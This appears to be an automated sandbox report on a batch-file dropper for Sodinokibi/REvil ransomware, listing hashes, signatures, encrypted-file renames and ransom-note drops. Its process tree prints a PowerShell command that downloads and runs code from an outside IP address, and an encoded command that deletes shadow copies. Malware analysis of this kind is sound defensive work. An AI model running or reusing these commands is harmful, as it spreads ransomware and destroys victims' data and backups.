Analysis
-
max time kernel
111s -
max time network
123s -
platform
windows7_x64 -
resource
win7v191014 -
submitted
10-02-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
hvQ21ebW.bat
Resource
win7v191014
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
hvQ21ebW.bat
Resource
win10v191014
windows10_x64
0 signatures
0 seconds
General
-
Target
hvQ21ebW.bat
-
Size
191B
-
MD5
7eb2eb2bf474386d8d7eef5ee2aaf3ef
-
SHA1
c9789a38150044b9ca8a4b9d350df691611f1861
-
SHA256
29b2a12ef2c75d6bb1bdbb4536e478a386dc4082a0756adc219bbd25c724bd1c
-
SHA512
827139be92e830cc7e7d6ac935327fe8960508ecb5e59cf338fb3cd2cc7cda12ae5686f15709bf5fec2cfb399912a9803f7b372601802bcd27e928072638b512
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/hvQ21ebW
Extracted
Language
ps1
Source
Signatures
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1184 wrote to memory of 1456 1184 cmd.exe powershell.exe PID 1456 wrote to memory of 2020 1456 powershell.exe powershell.exe PID 1456 wrote to memory of 2020 1456 powershell.exe powershell.exe PID 1456 wrote to memory of 2020 1456 powershell.exe powershell.exe PID 1456 wrote to memory of 2020 1456 powershell.exe powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 8 1456 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality
-
Discovering connected drives 3 TTPs 7 IoCs
Processes:
powershell.execmd.exepowershell.exedescription ioc process File opened (read-only) \??\B: powershell.exe File opened (read-only) \??\E: powershell.exe File opened (read-only) \??\C: cmd.exe File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\A: powershell.exe File opened (read-only) \??\F: powershell.exe File opened (read-only) \??\C: powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ao09zq21.bmp" powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1456 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1456 powershell.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeDebugPrivilege 2020 powershell.exe Token: SeBackupPrivilege 1568 vssvc.exe Token: SeRestorePrivilege 1568 vssvc.exe Token: SeAuditPrivilege 1568 vssvc.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1456 powershell.exe 1456 powershell.exe 1456 powershell.exe 2020 powershell.exe 2020 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 33 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\611dp0cc5-readme.txt powershell.exe File renamed C:\Program Files\ConvertFromGet.xla => \??\c:\program files\ConvertFromGet.xla.611dp0cc5 powershell.exe File opened for modification \??\c:\program files\StepConnect.temp powershell.exe File opened for modification \??\c:\program files\UnregisterEnable.ods powershell.exe File renamed C:\Program Files\ConfirmUpdate.mpeg2 => \??\c:\program files\ConfirmUpdate.mpeg2.611dp0cc5 powershell.exe File renamed C:\Program Files\DebugRevoke.txt => \??\c:\program files\DebugRevoke.txt.611dp0cc5 powershell.exe File renamed C:\Program Files\WaitDebug.mhtml => \??\c:\program files\WaitDebug.mhtml.611dp0cc5 powershell.exe File renamed C:\Program Files\ImportLimit.rm => \??\c:\program files\ImportLimit.rm.611dp0cc5 powershell.exe File renamed C:\Program Files\MountBlock.xltx => \??\c:\program files\MountBlock.xltx.611dp0cc5 powershell.exe File renamed C:\Program Files\PublishCopy.ppt => \??\c:\program files\PublishCopy.ppt.611dp0cc5 powershell.exe File opened for modification \??\c:\program files\UseSkip.xps powershell.exe File renamed C:\Program Files\UnregisterEnable.ods => \??\c:\program files\UnregisterEnable.ods.611dp0cc5 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\611dp0cc5-readme.txt powershell.exe File opened for modification \??\c:\program files\DebugRevoke.txt powershell.exe File opened for modification \??\c:\program files\RegisterJoin.vsd powershell.exe File renamed C:\Program Files\RegisterJoin.vsd => \??\c:\program files\RegisterJoin.vsd.611dp0cc5 powershell.exe File opened for modification \??\c:\program files\ConfirmUpdate.mpeg2 powershell.exe File opened for modification \??\c:\program files\ConvertFromGet.xla powershell.exe File renamed C:\Program Files\JoinMove.vbs => \??\c:\program files\JoinMove.vbs.611dp0cc5 powershell.exe File opened for modification \??\c:\program files\PushFormat.jpe powershell.exe File opened for modification \??\c:\program files\UnprotectWait.html powershell.exe File renamed C:\Program Files\UseSkip.xps => \??\c:\program files\UseSkip.xps.611dp0cc5 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\611dp0cc5-readme.txt powershell.exe File opened for modification \??\c:\program files\ImportLimit.rm powershell.exe File opened for modification \??\c:\program files\JoinMove.vbs powershell.exe File opened for modification \??\c:\program files\MountBlock.xltx powershell.exe File opened for modification \??\c:\program files\PublishCopy.ppt powershell.exe File renamed C:\Program Files\StepConnect.temp => \??\c:\program files\StepConnect.temp.611dp0cc5 powershell.exe File opened for modification \??\c:\program files\WaitDebug.mhtml powershell.exe File created \??\c:\program files (x86)\611dp0cc5-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\611dp0cc5-readme.txt powershell.exe File renamed C:\Program Files\PushFormat.jpe => \??\c:\program files\PushFormat.jpe.611dp0cc5 powershell.exe File renamed C:\Program Files\UnprotectWait.html => \??\c:\program files\UnprotectWait.html.611dp0cc5 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\hvQ21ebW.bat"1⤵
- Suspicious use of WriteProcessMemory
- Discovering connected drives
PID:1184 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/hvQ21ebW');Invoke-PBEESOQZ;Start-Sleep -s 10000"2⤵
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Discovering connected drives
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
PID:1456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Discovering connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2020
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1568